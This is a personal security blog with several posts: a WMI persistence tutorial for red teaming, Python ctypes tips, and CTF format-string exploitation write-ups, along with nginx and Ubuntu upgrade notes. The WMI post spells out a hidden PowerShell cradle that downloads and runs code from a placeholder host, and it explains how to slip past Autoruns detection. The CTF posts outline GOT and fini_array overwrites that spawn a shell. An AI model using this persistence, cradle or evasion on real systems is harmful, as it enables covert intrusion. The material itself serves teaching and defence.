Of course replace the <<the domain you are using this on>> and <<your analytics UA- tag>> with the appropriate data.
This will result in the server sending out a GET request with the client's info to the tracking URL for each page visit. It increases bandwidth used by your server but is a neat trick regardless.
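
To make the query string in the proxy_pass line easier to read, here is a minimal Python sketch that builds the same kind of pageview URL. The parameter names (v, tid, cid, t, dh, dp, dr, uip) are the ones from the config above; the function name pageview_url and the example values are made up for illustration.

```python
from urllib.parse import urlencode


def pageview_url(tracking_id, client_id, host, path, referer="", client_ip=""):
    """Build a pageview hit URL using the parameters from the nginx config."""
    params = {
        "v": "1",             # protocol version
        "tid": tracking_id,   # your analytics UA- tag
        "cid": client_id,     # unique visitor id (the uid cookie in the config)
        "t": "pageview",      # hit type
        "dh": host,           # document host
        "dp": path,           # document path
        "dr": referer,        # document referrer
        "uip": client_ip,     # IP address of the visitor
    }
    return "https://ssl.google-analytics.com/collect?" + urlencode(params)


# Placeholder values only
print(pageview_url("UA-0000-1", "abc", "example.com", "/posts/", client_ip="203.0.113.7"))
```

Note that urlencode percent-encodes values such as the path, so the output will not look byte-for-byte like the raw nginx variables.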

Upgrading an Amazon EC2 Instance from Ubuntu Trusty to Xenial

I had a bad time.
I ran a do-release-upgrade on one of my Amazon EC2 instances to try and upgrade it from 14.04 (Trusty) to 16.04 (Xenial). After the update and a reboot the box refused to come back up. When I detached the drive and attached it to another to check syslog I found this:

/sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
Usage: dhclient [-4|-6] [-SNTP1dvrx] [-nw] [-p <port>] [-D LL|LLT]
             [-s server-addr] [-cf config-file] [-lf lease-file]
             [-pf pid-file] [--no-pid] [-e VAR=val]
             [-sf script-file] [interface]
Failed to bring up eth0.

Oh good, it forgot how to eth0.
I spent about four hours figuring out how to fix it:

apt update
apt -y upgrade
cat  << EOF > /etc/update-manager/release-upgrades.d/unauth.cfg
[Distro]
AllowUnauthenticated=yes
EOF
apt install -y network-manager
do-release-upgrade
apt update
apt -y upgrade
systemctl enable systemd-networkd
systemctl enable systemd-resolved
dpkg-reconfigure resolvconf
apt-get -y autoremove
rm /etc/update-manager/release-upgrades.d/unauth.cfg
reboot

  1. Make sure you are up to date first.
  2. Some packages (python3) complain that they are unauthenticated. Feel free to skip this if you want.
  3. Install the network-manager
  4. Leap of faith... do the upgrade
  5. Finish the upgrade by installing the rest of the packages.
  6. Enable the systemd network daemon and resolver daemon
  7. Reconfigure resolvconf so you can dns
  8. Get rid of the unauth.cfg file you created
  9. Reboot and pray.

Thanks to these three links for the solutions (I just put them together):
- https://askubuntu.com/a/426121
- https://askubuntu.com/a/769239
- http://willhaley.com/blog/resolvconf-dns-issue-after-ubuntu-xenial-upgrade/

Scheduling Callbacks with WMI in C++

I am going to be starting a series of posts on what I have learned on Windows pentesting and post exploitation. These posts will have a heavy focus on red teaming for competitions and cyber exercises. I am not a pentester, but I think some of the places to hide in Windows are cool so I want to write about them. These posts will include code snippets in powershell and C++. Much of this code I had to figure out how to write using the MSDN docs alone and feel that it is useful to put on the internet somewhere so others don't have to go through so much hassle to make it work.

The topic of this post is scheduling persistent callbacks with Windows Management Instrumentation (WMI).

WMI Explained (in brief)

Essentially, WMI is an interface for configuration and information gathering on Windows systems. It is installed by default on Windows ME and up, which makes it a valuable resource for sysadmins and attackers. It contains information about all aspects of the system including processes, attached devices, and (I'm not kidding) games registered with Windows (wmic /namespace:\\root\cimv2\applications\games PATH game get). There is a lot of information here which will not be covered in this post. Exploration of what more WMI has to offer is left as an exercise to the reader!

The interface consists of namespaces, classes, and instances of classes. Namespaces contain different classes and instances are instances of classes in a namespace. Think of a namespace as a database, a class as a table schema, and an instance as a row in that table. Instances can have properties and callable methods. One of the standard examples of method calling in WMI is creating a process with the WMI command line interface command wmic:

wmic process call create calc.exe

The above line will spawn calc.exe as the current user. [[more]]

Callbacks via WMI

These callbacks can be triggered based on time or based on certain system events such as process starts/stops, drive mounts/dismounts, share creation, and any other events that get triggered in WMI. I will be exploring non-timer event driven callbacks in another post. There are four WMI classes we care about for scheduling these callbacks: CommandLineEventConsumer, __IntervalTimerInstruction, __EventFilter, and __FilterToConsumerBinding.

Event Consumers

Event consumers are essentially instructions on what to do when a particular event is fired. There are four event consumers located in the ROOT/SUBSCRIPTION namespace that can be used to respond to events:
- CommandLineEventConsumer - Run a cmd command
- ActiveScriptEventConsumer - Run javascript or VBScript text block or file
- NTEventLogEventConsumer - Log to the event log
- SMTPEventConsumer - Send an email
All four of these classes are sub-classes of __EventConsumer.
The first two are great for attackers, while the last two are great for defenders. In this post I will be using the CommandLineEventConsumer to launch callbacks in response to certain events firing.

The properties of a CommandLineEventConsumer instance are detailed below:

class CommandLineEventConsumer : __EventConsumer
{
    [key] string Name;
    [write] string ExecutablePath;
    [Template, write] string CommandLineTemplate;
    [write] boolean UseDefaultErrorMode = FALSE;
    [DEPRECATED] boolean CreateNewConsole = FALSE;
    [write] boolean CreateNewProcessGroup = FALSE;
    [write] boolean CreateSeparateWowVdm = FALSE;
    [write] boolean CreateSharedWowVdm = FALSE;
    [write] sint32 Priority = 32;
    [write] string WorkingDirectory;
    [DEPRECATED] string DesktopName;
    [Template, write] string WindowTitle;
    [write] uint32 XCoordinate;
    [write] uint32 YCoordinate;
    [write] uint32 XSize;
    [write] uint32 YSize;
    [write] uint32 XNumCharacters;
    [write] uint32 YNumCharacters;
    [write] uint32 FillAttribute;
    [write] uint32 ShowWindowCommand;
    [write] boolean ForceOnFeedback = FALSE;
    [write] boolean ForceOffFeedback = FALSE;
    [write] boolean RunInteractively = FALSE;
    [write] uint32 KillTimeout = 0;
};

The properties we care about setting are Name and CommandLineTemplate. The Name is just the name of the consumer and the CommandLineTemplate is the command to run for the callback we are going to create. Let's make it an HTTP-based callback:

powershell -w hidden -ep bypass -nop -c "IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('http://your.domain.here/callback.txt'))))";

This will download and run whatever base 64 encoded powershell code is at the URL http://your.domain.here/callback.txt.

Timer Instructions

A timer instruction fires on (obviously) a timer. There are two types of timers: interval and absolute. Interval timers run at an interval specified in milliseconds, whereas an absolute timer fires one time when the system time reaches the time specified in the instance.
Each of these timer types has a corresponding WMI class: __IntervalTimerInstruction and __AbsoluteTimerInstruction. Both are sub-classes of __TimerInstruction. For this example I am using the interval-based version.

The properties of an __IntervalTimerInstruction instance are detailed below:

class __IntervalTimerInstruction : __TimerInstruction
{
    [not_null: DisableOverride ToInstance ToSubClass, units("milliseconds"): DisableOverride ToInstance ToSubClass] uint32 IntervalBetweenEvents;
};

The parent class is also important and is shown below:

class __TimerInstruction : __EventGenerator
{
    [key] string TimerId;
    boolean SkipIfPassed = FALSE;
};

TimerId and IntervalBetweenEvents are the properties we care about. TimerId is the name of the timer and IntervalBetweenEvents is the number of milliseconds between event triggers. Events that are triggered at each interval are instances of the __TimerEvent class. This information will become important in the next section.

Event Filters

An event filter tells WMI what events and parameters we care about. We can use WMI Query Language (WQL) queries to select events that matter. Creating an event filter is as easy as creating an instance of the __EventFilter class, which is detailed below:

class __EventFilter : __IndicationRelated
{
    [key] string Name;
    [read: DisableOverride ToInstance ToSubClass] uint8 CreatorSID[] = {1, 1, 0, 0, 0, 0, 0, 5, 18, 0, 0, 0};
    string QueryLanguage;
    string Query;
    string EventNamespace;
    string EventAccess;
};

Name, QueryLanguage, Query, and EventNamespace are of note. Name is the name of the filter, QueryLanguage specifies what query syntax to use for the Query field. I don't know of any other setting than WQL for QueryLanguage. Query is the actual WQL (or other) query to run to check for events. To query for the timer described above the __TimerEvent class needs to be queried:

SELECT * from __TimerEvent where TimerId="YourTimerId"

Finally, the EventNamespace can be left blank for queries in the same namespace (which is the case for this example). If the query must be done in another namespace (such as root/cimv2 for many Windows events), then the namespace needs to be supplied. root/subscription would be represented as root\subscription in the Query field.

Filter to Consumer Bindings

A filter to consumer binding associates an __EventFilter instance with an __EventConsumer instance. The Filter property of an instance of this class must be set to the path to the __EventFilter created above. An example path is __EventFilter.Name="Filter1" where Filter1 is the Name of the event filter. The Consumer property is set up the same (ex. CommandLineEventConsumer.Name="CliEC1"). I have not tested it, but I think you can link consumers and filters in other namespaces by providing the full path: ROOT\\CIMV2:__EventFilter.Name="Filter1".
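
To show how the four instances point at each other, here is a minimal Python sketch that only builds plain dictionaries; it does not touch WMI at all. The helper names (instance_path, timer_callback_chain), the "__class" key, and the naming scheme are hypothetical. The property names, the path format, and the WQL query come from the sections above.

```python
def instance_path(class_name, key, value):
    """Relative WMI object path, e.g. __EventFilter.Name="Filter1"."""
    return '{}.{}="{}"'.format(class_name, key, value)


def timer_callback_chain(prefix, command, interval_ms):
    """Describe the four instances as dicts (nothing is written to WMI)."""
    timer_id = prefix + "Timer"
    consumer = {
        "__class": "CommandLineEventConsumer",
        "Name": prefix + "Consumer",
        "CommandLineTemplate": command,
    }
    timer = {
        "__class": "__IntervalTimerInstruction",
        "TimerId": timer_id,
        "IntervalBetweenEvents": interval_ms,  # milliseconds
    }
    event_filter = {
        "__class": "__EventFilter",
        "Name": prefix + "Filter",
        "QueryLanguage": "WQL",
        # The filter selects the __TimerEvent instances fired by our timer
        "Query": 'SELECT * FROM __TimerEvent WHERE TimerId="{}"'.format(timer_id),
    }
    binding = {
        "__class": "__FilterToConsumerBinding",
        # The binding refers to the filter and the consumer by object path
        "Filter": instance_path("__EventFilter", "Name", event_filter["Name"]),
        "Consumer": instance_path("CommandLineEventConsumer", "Name", consumer["Name"]),
    }
    return [consumer, timer, event_filter, binding]


for inst in timer_callback_chain("Demo", "notepad.exe", 60000):
    print(inst)
```

The point to notice is that the timer and the filter are tied together only by the TimerId string in the query, while the binding ties the filter and the consumer together by path.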

Now that you understand the four important classes to make this all work the code is a lot easier to parse through.

WMI Callbacks in Code

Doing it in Powershell

Matt Graeber is a good man. He has a lot of PowerShell examples of this. I will not be writing my own PowerShell for this post but I will share some of his gists that help you schedule stuff in WMI. This code helped me write the C++ that is in the next section.

This first script shows the full chain from storing code in the registry to creating the four WMI instances to schedule callbacks.

The second script is a bit simpler and shows making an event consumer that gets triggered on a volume change rather than on a timer. This is also cool to do.

Doing it in C++

This code sample was constructed from MSDN docs on COM and the Windows WBEM interface, Matt Graeber's powershell scripts, and random other bits of knowledge scattered throughout the internet. It goes through the full chain of scheduling command line callbacks.

Mitigation

The best way to stop this from happening is just to delete all event consumers, timer instructions, event filters, and filter to consumer bindings. I think the only thing that needs to be created in the subscription namespace is the event consumer since root/subscription is the only place ActiveScriptEventConsumer and CommandLineEventConsumer exist. There are no critical Windows components that require this scheduling method, so it should be okay just to delete them all:

wmic /namespace:\\root\subscription PATH __EventConsumer delete
wmic /namespace:\\root\subscription PATH __TimerInstruction delete
wmic /namespace:\\root\subscription PATH __EventFilter delete
wmic /namespace:\\root\subscription PATH __FilterToConsumerBinding delete

These WMI callbacks may also show up in Sysinternals Autoruns and can be deleted from its interface:

autoruns

Based on some other tests I have run, I have found that Autoruns shows yellow entries for ones whose files it cannot find, as shown above. Changing the command in the CommandLineTemplate property so that it uses powershell.exe or the absolute path of powershell instead of just powershell makes the entry turn red! Even worse. Entries can be hidden from Autoruns by setting the CommandLineTemplate property as follows:

cmd.exe /c powershell -w hidden -ep bypass -nop -c "your stealth command here"

Autoruns' detection of this kind of persistence is very basic and easily bypassed :)

Who uses this?

WMI is used by several actors, mostly for information gathering and persistence. APT29 (a.k.a. Cozy Bear) uses this particular form of WMI persistence to run tasks at specified intervals. The backdoor was supposedly used in the DNC hacks that surrounded the 2016 presidential election. CrowdStrike has a fantastic write up on their site.
Source: Mitre ATT&CK

Experimentation and tools

WMI explorer (see references) was a huge help when testing this stuff out. I find it easiest to experiment in powershell and then finalize anything in C++ for delivery with malware that does other things too. Matt's scripts are a great starting point.

References and resources

Trend Micro paper detailing WMI scheduled callbacks. - http://la.trendmicro.com/media/misc/understanding-wmi-malware-research-paper-en.pdf
COM API for WMI - https://msdn.microsoft.com/en-us/library/aa389276(v=vs.85).aspx
Code sample for setting up WMI connection in C++ - https://msdn.microsoft.com/en-us/library/aa390423(v=vs.85).aspx
WMI Explorer - https://wmie.codeplex.com/


I hope this post has been informative for anyone curious about Windows internals and some of the nasty things you can accomplish with WMI. Check back for other posts in this series!

A Better Way to Work with Raw Data Types in Python

Working with raw data in any language can be a pain. If you are a developer there are many solutions to make it easier such as Google's Protocol Buffers. If you are a reverse engineer these methods can be too bulky especially if you are trying to quickly script an exploit (perhaps in a CTF where time is constrained). Python has always been my go-to language for exploit dev and general script writing but working with raw datatypes using just pack and unpack from the struct module is annoying and leaves much to be desired. I'm here to tell you that if you are still using pack and unpack for complex datatypes there is a better way.

For the sake of this post we will attempt to work with the raw datatypes below, defined as C structures:

typedef struct __attribute__((packed)) NestedStruct_ {
    unsigned char flags[3];
    uint8_t val1;
    uint8_t val2;
} NestedStruct;

typedef struct __attribute__((packed)) ExampleNetworkPacket_ {
    uint16_t version;
    uint16_t reserved;
    uint32_t sanity;
    NestedStruct ns;
    uint32_t datalen;
    unsigned char data[0];
} ExampleNetworkPacket;

The total size of the ExampleNetworkPacket structure will be 17 bytes plus any data appended on it.

As a side note, I just recently learned that the zero-length array at the end of ExampleNetworkPacket is valid (it is a GNU C extension; C99 spells it data[]) and is a handy pointer to the end of the structure, instead of having to do this:

unsigned char *data = (unsigned char *)examplenetworkpacketptr + sizeof(ExampleNetworkPacket);

Neat.
[[more]]

Moving on, let's say that you had reverse engineered this program and figured out these structures and named their fields. You set out to build a way to take raw data from a socket and get the fields of these structures. If you were using struct's pack and unpack methods you would do something like this:

from struct import pack, unpack

# the header is 17 bytes; unpack needs exactly that many
version, reserved, sanity, flags, val1, val2, datalen = unpack(">HHL3sBBL", recvbuf[:17])
data = recvbuf[17:]

This isn't too bad, actually. The more annoying part is putting one of these things back together...

# flags is a 3 byte field, so it has to be passed as bytes
version, reserved, sanity, flags, val1, val2, datalen = 1, 0, 0x69696969, b"\x01\x00\x00", 2, 3, len(data)
sendbuf = pack(">HHL3sBBL", version, reserved, sanity, flags, val1, val2, datalen) + data

Still not too long but it's not clean and you can't easily have different instances like you can with real structs in C.

Python's ctypes module can help you here. It has LittleEndianStructure and BigEndianStructure classes that will help turn the above code into something more usable and readable. BigEndianStructure is particularly useful for network protocols such as the one in the example.

Basic Structures

To get started import ctypes and make a class that inherits the BigEndianStructure. You'll want to import everything from the ctypes module to save you some typing.

from ctypes import *
class MyFirstStructure(BigEndianStructure):
    _pack_ = 1
    _fields_ = [ ('intfield', c_int),
                 ('bytefield', c_ubyte)]

This is a 5 byte structure equivalent to the following C code:

struct __attribute__((packed)) MyFirstStructure {
    int intfield;
    unsigned char bytefield;
};

Note the packed attribute in both snippets. This is important for the following reason:

>>> m = MyFirstStructure()
>>> sizeof(m)
5
>>> class MyFirstStructure(BigEndianStructure):
...    _pack_ = 0
...    _fields_ = [ ('intfield', c_int),
...                 ('bytefield', c_ubyte)]
>>> m = MyFirstStructure()
>>> sizeof(m)
8

The packed structure has a size of 5 while the unpacked structure has a size of 8 because, unless packing is specified, a structure is padded out to a multiple of its most strictly aligned member (4 bytes for an int on most common architectures). Eric Raymond has a great write up on structure packing at his site if you want to know more about that.

Packing becomes important for network protocols because if you have a byte and then an integer (32 bit) it will pad out the byte to 32 bits as well causing your structure type to be off.

Setting attributes of the structure is as easy as just assigning values:

m = MyFirstStructure()
m.intfield = 1072

Getting Raw Bytes and Making Structures from Raw Bytes

I love the book Black Hat Python by Justin Seitz. These particular extensions to the Structure class are based off of some of the code in Black Hat Python. It is talked about here.

We want to define a generic NetStruct class that we can make our structures inherit so they have useful traits:

class NetStruct(BigEndianStructure):
    _pack_ = 1

    def __str__(self):
        return buffer(self)[:]

    def __new__(self, sb=None):
        if sb:
            return self.from_buffer_copy(sb)
        else:
            return BigEndianStructure.__new__(self)

    def __init__(self, sb=None):
        pass

Let's break this down one function at a time:
1. __str__(self) - When we call str() or bytes() on an instance of the structure we want it to return us the raw data from the structure. This makes it easy to send over a socket.
2. __new__(self, sb=None) - Creates the structure from a raw byte buffer or just makes a blank one.
3. __init__(self, sb=None) - Accepts the input buffer (sb) and ignores it. __new__ has already consumed the buffer; without this override the default Structure constructor would try to assign sb to the first field.

With these functions overridden the structure is easier to convert to and from raw bytes.

Building the Protocol

With knowledge of packing in mind let's build our NestedStruct first:

class NestedStruct(NetStruct):
    _fields_ = [('flags', c_ubyte*3),
                ('val1', c_ubyte),
                ('val2', c_ubyte)]

The feature of note here is that you can create arrays by just multiplying the type by the number of elements you need.
This one was fairly simple. Now for the ExampleNetworkPacket structure:

class ExampleNetworkPacket(NetStruct):
    _fields_ = [('version', c_ushort),
               ('reserved', c_ushort),
               ('sanity', c_uint),
               ('ns', NestedStruct),
               ('datalen', c_uint)]

Two things to note here: first, we can nest structures by simply including another structure as an element and second data is missing! How do we define a field that has a variable length?

Variable length fields

This is sort of where things get tricky. I was searching the internet for a solution to this problem and came across this StackOverflow post.

The code provided actually segfaulted python occasionally... so I ended up just going the simpler route: define the real array as a hidden variable and define the actual data attribute with a getter and setter to modify that array.

class ExampleNetworkPacket(NetStruct):
    _fields_ = [('version', c_ushort),
                ('reserved', c_ushort),
                ('sanity', c_uint),
                ('ns', NestedStruct),
                ('datalen', c_uint)]
    _data = (c_ubyte * 0)()

    @property
    def data(self):
        return str(buffer(self._data))

    @data.setter
    def data(self, indata):
        self.datalen = len(indata)
        self._data = (self._data._type_ * len(indata))()
        memmove(self._data, indata, len(indata))

    def __str__(self):
        return super(ExampleNetworkPacket, self).__str__() + self.data

There is a lot going on here. First, there is an internal data attribute _data that is the actual underlying ctypes array for the data. The @property tag makes it so you can reference data like an attribute (without parentheses). @data.setter defines what to do when you try setting the property attribute (i.e. pkt.data = "boo"). In this case when we access data we want it to return the raw bytes of _data and when we set data we want it to create a new array of the same type but of the new size of the data. We also set the datalen attribute in the setter because it makes things more convenient. Finally, the __str__ function has to be overridden to include the data on the end. Without it you would just get the header.

Testing it Out

>>> enp = ExampleNetworkPacket()
>>> enp.ns.flags[0] = 1
>>> enp.ns.flags[2] = 1
>>> enp.ns.val2 = 0xff
>>> enp.sanity = 0xabcd1234
>>> enp.version = 1
>>> enp.data = "hello world, nice struct"
>>> enp.datalen
24
>>> len(enp.data)
24
>>> enp.data
'hello world, nice struct'
>>> bytes(enp)
'\x00\x01\x00\x00\xab\xcd\x124\x01\x00\x01\x00\xff\x00\x00\x00\x18hello world, nice struct'
>>> enp2 = ExampleNetworkPacket(bytes(enp))
>>> enp.data
'hello world, nice struct'

Now it works exactly as you'd hope. It took a little work but the results are worth it!
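
The snippets above are Python 2 (buffer, and str doubling as bytes). Below is a rough Python 3 sketch of the same idea, under a few assumptions: the variable-length data is kept outside the ctypes structure entirely, and the names from_bytes, to_bytes, PacketHeader, build_packet, and parse_packet are mine rather than anything from ctypes or the original code.

```python
import ctypes


class NetStruct(ctypes.BigEndianStructure):
    """Packed, big-endian base class with a bytes round trip."""
    _pack_ = 1

    @classmethod
    def from_bytes(cls, raw):
        # Needs at least sizeof(cls) bytes; anything after that is ignored
        return cls.from_buffer_copy(raw)

    def to_bytes(self):
        # Copy the raw memory backing this structure
        return ctypes.string_at(ctypes.addressof(self), ctypes.sizeof(self))


class NestedStruct(NetStruct):
    _fields_ = [("flags", ctypes.c_ubyte * 3),
                ("val1", ctypes.c_ubyte),
                ("val2", ctypes.c_ubyte)]


class PacketHeader(NetStruct):
    # Fixed-size part of ExampleNetworkPacket (17 bytes)
    _fields_ = [("version", ctypes.c_uint16),
                ("reserved", ctypes.c_uint16),
                ("sanity", ctypes.c_uint32),
                ("ns", NestedStruct),
                ("datalen", ctypes.c_uint32)]


def build_packet(header, payload):
    """Set datalen and return header bytes followed by the payload."""
    header.datalen = len(payload)
    return header.to_bytes() + payload


def parse_packet(raw):
    """Split raw bytes into (header, payload) using datalen."""
    header = PacketHeader.from_bytes(raw)
    start = ctypes.sizeof(PacketHeader)
    return header, raw[start:start + header.datalen]


hdr = PacketHeader()
hdr.version = 1
hdr.sanity = 0xABCD1234
hdr.ns.flags[0] = 1
hdr.ns.flags[2] = 1
hdr.ns.val2 = 0xFF
wire = build_packet(hdr, b"hello world, nice struct")
parsed, payload = parse_packet(wire)
print(wire)
print(parsed.version, hex(parsed.sanity), parsed.datalen, payload)
```

Keeping the payload out of the structure avoids the hidden _data array and the property pair, at the cost of having two helper functions instead of one self-contained class.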

Bonus: Bitfields

ctypes also supports bitfields. Let's take the IP header as an example:

class IP(Structure):
    _fields_ = [("ihl", c_ubyte, 4),
        ("version", c_ubyte, 4),
        ("tos", c_ubyte),
        ("len", c_ushort),
        ("id", c_ushort),
        ("offset", c_ushort),
        ("ttl", c_ubyte),
        ("protocol_num", c_ubyte),
        ("sum", c_ushort),
        # c_uint32 rather than c_ulong: c_ulong is 8 bytes on 64-bit Linux and macOS
        ("src", c_uint32),
        ("dst", c_uint32)]

Here ihl and version are 4 bits each. The third element in the tuple is how many bits to use if not all of them.
This makes ctypes structures even more powerful.
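
A small sketch of what the bitfields buy you, assuming a little-endian host (which is where the field order ihl-then-version above lines up with the wire format). The class name FirstByte is made up; it models only the first byte of the IP header and compares the bitfield values with doing the shifts by hand.

```python
import ctypes


class FirstByte(ctypes.LittleEndianStructure):
    # Low nibble first, then high nibble, matching the field order used above
    _fields_ = [("ihl", ctypes.c_ubyte, 4),
                ("version", ctypes.c_ubyte, 4)]


raw = b"\x45"  # typical first byte of an IPv4 header: version 4, header length 5 words
fb = FirstByte.from_buffer_copy(raw)

# The same values pulled out manually with a shift and a mask
manual_version = raw[0] >> 4
manual_ihl = raw[0] & 0x0F

print(fb.version, fb.ihl, manual_version, manual_ihl)
```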

Python for Hackers

This is getting posted a bit late, but here is a presentation I gave remotely for RIT's Competitive Cybersecurity Club Conference (RC4) 2016 on python tricks for hackers. It's a collection of things that I often use within python that make writing functional tools easier.

MMACTF 2016 - Greeting

Challenge description:

Pwn
Host : pwn2.chal.ctf.westerns.tokyo
Port : 16317

Reversing and Finding the Bug

Reversing with radare2:

Looks like another textbook format string vulnerability because the user buffer is put into sprintf and then straight into printf. This time I had to actually do the work of getting code execution because the flag was not loaded onto the stack.

Running the binary

I wanted to see the bug in action so I loaded up my Ubuntu VM using vagrant and checked it out:

→ ./greeting
Hello, I'm nao!
Please tell me your name... %08x
Nice to meet you, 080487d0 :)

Neat. Now for exploitation.

Background

For information on printf and a more basic format string exploit, check out the post I did on the judgement pwn challenge also from this CTF. In addition to having positional arguments, printf also has a cool feature where you can write the number of bytes that have been printed so far to a variable. This feature is what makes format string vulnerabilities so dangerous. If you can exploit one, you can get arbitrary write.

Passing %hn to printf in the format string writes the number of characters printed so far as a half word (2 bytes). Combining this with positional arguments allows half a word at a time to be written anywhere. So this is bad.
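To make the half-word write concrete, here is a rough sketch of building such a format string by hand for a 32-bit target. This is not what libformatstr does internally, just the general idea. The helper name fmt_write32 is made up, the value being written is an arbitrary placeholder, and the sketch assumes the target addresses sit at the very start of the buffer with `argnum` pointing at the first of them.

```python
import struct


def fmt_write32(addr, value, argnum, printed=0):
    """Build a format string that writes a 32-bit `value` to `addr`
    using two %hn writes (hypothetical helper, 32-bit little-endian).

    argnum  -- positional index of the first 4 bytes of this buffer
    printed -- characters already printed before the buffer
    """
    halves = [(value & 0xFFFF, addr), ((value >> 16) & 0xFFFF, addr + 2)]
    halves.sort()  # write the smaller half first so the count only grows

    payload = b"".join(struct.pack("<I", a) for _, a in halves)
    count = printed + len(payload)
    for i, (half, _) in enumerate(halves):
        pad = (half - count) % 0x10000  # characters still needed
        if pad:
            payload += b"%%%dc" % pad   # print `pad` filler characters
        payload += b"%%%d$hn" % (argnum + i)
        count += pad
    return payload


# Placeholder value; the address is the .fini_array entry from objdump.
payload = fmt_write32(0x08049934, 0x080485ED, argnum=12)
print(payload)
```

Addresses that contain null bytes or whitespace would break this naive layout, which is one reason to reach for a library instead.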

If you are interested in learning more about how format string vulnerabilities work then check out this paper

Exploitation

I decided to use libformatstr for this because I have never used it before and it seemed useful so I didn't have to craft the buffer manually.

The payload function takes two arguments: an argument number and a padding number. The argument number is the word distance in memory away from your input and the padding is the number of bytes your input needs to be padded for the addresses you enter to be word aligned. libformatstr can be used to determine these numbers:

from pwn import *
from libformatstr import *

e = ELF("./greeting")
r = process(e.path)

r.sendline(make_pattern(0x40))
r.recvuntil("you, ")
res = r.recv()
print(res)
argnum, padding = guess_argnum(res, 0x40)
log.info("argnum: {}, padding: {}".format(argnum, padding))

Running this resulted in an output of argnum: 12, padding: 2. There was one other bit that needed to be changed as well. Since "Nice to meet you, " was being prepended to my input I had to set an additional argument when setting up the format string exploit called start_num.

Armed with the argument number, padding, and start number I was ready to try and overwrite some values. The issue I ran into was that there are no function calls after the call to printf in main. I thought of trying to overwrite a destructor (dtors), but there were none. I came across a way to overwrite the fini section of a binary to execute a function when the program was supposed to be quitting. I could not find much documentation on exactly what I needed to overwrite to make this work so I just used objdump and grep to find the symbols with fini in the name:

→ objdump -t greeting | grep fini
08048780 l    d  .fini  00000000              .fini
08049934 l    d  .fini_array    00000000              .fini_array
08049934 l     O .fini_array    00000000              __do_global_dtors_aux_fini_array_entry
08048740 g     F .text  00000002              __libc_csu_fini
08048780 g     F .fini  00000000              _fini

Five choices. Through trial and error I determined that overwriting whatever was at __do_global_dtors_aux_fini_array_entry gave me control of the program.

My plan of attack became the following:
1. Overwrite __do_global_dtors_aux_fini_array_entry with main
2. Overwrite the GOT entry for strlen with system
3. Write the full format string line into the program
4. When main executes the second time, write /bin/sh so that the call to strlen in the getnline function executes system("/bin/sh") and gives me a shell!

I wrote the following script to do the above:

Running it resulted in the flag :)

→ python greet2.py REMOTE
[*] '/home/vagrant/CTF/tokyo/greeting'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE
[x] Opening connection to pwn2.chal.ctf.westerns.tokyo on port 16317
[x] Opening connection to pwn2.chal.ctf.westerns.tokyo on port 16317: Trying 40.74.112.206
[+] Opening connection to pwn2.chal.ctf.westerns.tokyo on port 16317: Done
[+] Wrote system onto strlen and main onto fini... trying shell
[+] got shell
[+] Flag: TWCTF{51mpl3_FSB_r3wr173_4nyw4r3}
[*] Closed connection to pwn2.chal.ctf.westerns.tokyo port 16317

W00t!
TWCTF{51mpl3_FSB_r3wr173_4nyw4r3}

MMACTF 2016 - Judgement

Challenge description:

Pwn Warmup
Host : pwn1.chal.ctf.westerns.tokyo
Port : 31729

This was a binary pwn challenge, so I loaded it up in radare2 to take a look:

Looks like a textbook format string vulnerability. printf has a positional arguments feature so normally you can specify which argument you want to use if you are the programmer. The following is an example use case of this:

printf("3rd argument: %3$08x, 1st argument: %1$c\n", 'a', "unused", 0x41414141);

This will print "3rd argument: 41414141, 1st argument: a" (%08x does not add a 0x prefix).

Format string vulnerabilities occur when a user controlled buffer is passed to printf. When printf is called it reads things off of the stack (function arguments) to print. Because the input buffer is passed straight in it allows reads off of the stack.

Since the address of the flag was loaded on the stack before the main function, it was somewhere reachable by printf's positional arguments.

I just wrote a loop to brute force the exact offset number and spit out the flag:

→ for i in {10..50}; do echo "%$i\$s" | nc pwn1.chal.ctf.westerns.tokyo 31729; done | grep CTF
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}
Input flag >> TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}

I got it more than once... but I got it.

TWCTF{R3:l1f3_1n_4_pwn_w0rld_fr0m_z3r0}

CTFX 2016 - dat-boinary

Reversing the Binary

This challenge provided two binaries: dat-boinary and libc.so.6. Usually this combination requires you to leak memory, calculate offsets, and call system or an exec function from libc. With that in mind I jumped right in to reversing with radare2. The functions are rather large so I will leave this as an exercise to the reader. The binary can be found here.

The first block of main allocates a dynamic buffer of size 0x80 with malloc and gets a "meme id" of up to 9 bytes that is stored in ebp-0x20. The next block provides five menu options: update the meme id, update the meme dankness, update meme content, print meme contents, and the super secret meme option. The first 4 are pretty straight forward, while the last is not so much.

Stack locations of interest are:

  • ebp-0xc - location of menu choice (4 bytes)
  • ebp-0x10 - Temporary storage for the dankness of the meme (4 bytes)
  • ebp-0x14 - malloced buffer for meme content - (4 byte pointer)
  • ebp-0x18 - Meme dankness if the temporary dankness is greater than 0x7f (4 bytes)
  • ebp-0x20 - meme id location (8 bytes)

After some trial and error in gdb I noticed that the initial fgets for the id of the meme takes 9 characters instead of the provided 8. This would prove useful later.

Setting the meme id using the menu option used the length of the preexisting id to know how much to read from the user. This will also be useful, because as long as null bytes in the meme dankness can be avoided then the pointer to the malloced buffer can be overwritten and arbitrary write can be achieved. The only issue here is that this bug can only be triggered once without somehow making strlen return more than the actual strlen of the buffer. Again, that's a task for after investigation.

Setting the dankness involved reading in a number into ebp-0x10 (temporary dankness storage), checking if it was over 0x7f, and then moving it into the meme dankness memory location (ebp-0x18) if that check was false. This is a problem because the meme dankness is directly before the pointer that I wanted to overwrite.

The update content option does exactly what one would expect, but with one additional check: it uses fgets to read into the buffer allocated by malloc. The number of bytes it reads is the dankness number. Before anything is read it checks if the dankness is over 0x80, because that would cause a buffer overflow.

Print contents is also straight forward; it prints the content of the meme with a proper call to printf.

Finally, the secret meme function is passed the meme id buffer and then calls secret_meme. The secret_meme function sets meme id + 8 to 0x69696969 and prints something...

here come dat boi
      ,++++
       ###+.
        #+++
        ++++
      +++++++
   ;+#, ++++'
 ,#`    +++++
        +###'
        +###+'
      +##'#++
      .#:+++#+
      ++  ;  +
       +` ;  +
        +;; ++
